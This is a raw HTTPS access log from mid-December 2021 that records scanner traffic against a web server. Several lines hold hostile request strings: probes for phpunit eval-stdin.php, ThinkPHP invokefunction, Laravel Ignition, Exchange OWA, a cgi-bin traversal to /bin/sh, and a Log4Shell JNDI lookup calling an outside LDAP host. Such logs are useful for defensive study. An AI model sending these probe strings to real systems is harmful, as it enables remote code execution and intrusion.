[14/Dec/2021:01:25:11 +0100] 54.186.164.94 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[14/Dec/2021:01:34:27 +0100] 54.190.132.5 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[14/Dec/2021:03:16:04 +0100] 192.236.147.66 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /wp-content/plugins/capability-manager-enhanced/common/js/admin.dev.js HTTP/1.1" 463
[14/Dec/2021:03:24:58 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[14/Dec/2021:03:48:09 +0100] 195.251.41.139 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:04:00:11 +0100] 192.241.215.36 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[14/Dec/2021:04:09:50 +0100] 89.248.165.52 - - "-" -
[14/Dec/2021:04:14:41 +0100] 192.241.214.179 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[14/Dec/2021:04:53:11 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[14/Dec/2021:04:59:05 +0100] 34.96.130.11 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377
[14/Dec/2021:05:04:03 +0100] 192.35.168.96 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:05:08:07 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[14/Dec/2021:06:05:15 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 390
[14/Dec/2021:06:57:13 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 327
[14/Dec/2021:07:08:15 +0100] 89.248.165.52 - - "-" -
[14/Dec/2021:08:41:05 +0100] 1.179.247.182 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:08:41:06 +0100] 1.179.247.182 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:08:41:08 +0100] 1.179.247.182 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:08:41:08 +0100] 1.179.247.182 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:08:56:33 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /console/ HTTP/1.1" 307
[14/Dec/2021:09:57:25 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /_ignition/execute-solution HTTP/1.1" 319
[14/Dec/2021:09:59:47 +0100] 89.145.206.105 TLSv1.2 AES256-SHA "GET /?q=%7Bjndi%!A(MISSING)ldap%!A(MISSING)%!F(MISSING)%!F(MISSING)log4shell.huntress.com%!A(MISSING)1389%!F(MISSING)5e4155fe-0cec-4964-a51c-1acdc8fabe8d%!D(MISSING) HTTP/1.1" 387
[14/Dec/2021:10:24:08 +0100] 199.249.230.163 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:10:25:19 +0100] 171.25.193.77 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309
[14/Dec/2021:10:55:39 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:11:28:17 +0100] 208.100.26.236 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 297
[14/Dec/2021:11:50:45 +0100] 103.149.192.26 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:12:32:48 +0100] 141.98.83.139 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:13:04:44 +0100] 45.146.164.160 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:13:04:45 +0100] 45.146.164.160 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:13:11:02 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 293
[14/Dec/2021:13:20:29 +0100] 65.49.20.68 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[14/Dec/2021:13:47:07 +0100] 192.241.200.201 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[14/Dec/2021:13:56:16 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:14:29:42 +0100] 61.219.11.151 - - "-" -
[14/Dec/2021:14:30:50 +0100] 86.109.208.194 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:14:30:50 +0100] 86.109.208.194 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:14:30:50 +0100] 86.109.208.194 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:14:30:51 +0100] 86.109.208.194 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:14:52:21 +0100] 185.180.143.79 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[14/Dec/2021:15:57:22 +0100] 5.188.206.26 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:16:28:33 +0100] 170.130.187.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 374
[14/Dec/2021:17:30:54 +0100] 185.180.143.147 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 297
[14/Dec/2021:18:27:50 +0100] 34.77.162.3 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 393
[14/Dec/2021:18:35:22 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "POST /_ignition/execute-solution HTTP/1.1" 319
[14/Dec/2021:18:35:26 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:18:35:29 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET /script HTTP/1.1" 305
[14/Dec/2021:18:35:33 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET /login HTTP/1.1" 305
[14/Dec/2021:18:35:37 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET /jenkins/login HTTP/1.1" 312
[14/Dec/2021:18:35:42 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET /manager/html HTTP/1.1" 308
[14/Dec/2021:18:35:45 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET /wp-login.php HTTP/1.1" 311
[14/Dec/2021:18:35:48 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=mx05rkbm HTTP/1.1" 383
[14/Dec/2021:18:35:51 +0100] 121.40.119.88 TLSv1.2 AES256-SHA "GET /users/sign_in HTTP/1.1" 311
[14/Dec/2021:18:58:52 +0100] 192.241.213.90 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[14/Dec/2021:21:37:44 +0100] 95.211.247.72 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 303
[14/Dec/2021:22:23:52 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[14/Dec/2021:22:24:02 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[14/Dec/2021:22:24:03 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[14/Dec/2021:22:24:04 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[14/Dec/2021:22:24:08 +0100] 71.6.167.142 TLSv1.2 AES256-SHA "quit" 379
[14/Dec/2021:22:24:09 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[14/Dec/2021:22:24:09 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394
[14/Dec/2021:22:24:11 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[14/Dec/2021:22:24:13 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309
[14/Dec/2021:22:24:14 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "-" -
[14/Dec/2021:22:24:16 +0100] 71.6.167.142 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[14/Dec/2021:23:57:54 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[15/Dec/2021:00:21:45 +0100] 192.241.209.10 TLSv1.2 AES256-SHA "GET /ReportServer HTTP/1.1" 307
[15/Dec/2021:00:41:28 +0100] 192.241.201.179 TLSv1.2 AES256-SHA "GET /login HTTP/1.1" 305
[15/Dec/2021:00:41:41 +0100] 152.32.134.14 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 383
[15/Dec/2021:00:46:28 +0100] 207.46.13.127 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[15/Dec/2021:00:58:53 +0100] 130.211.54.158 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301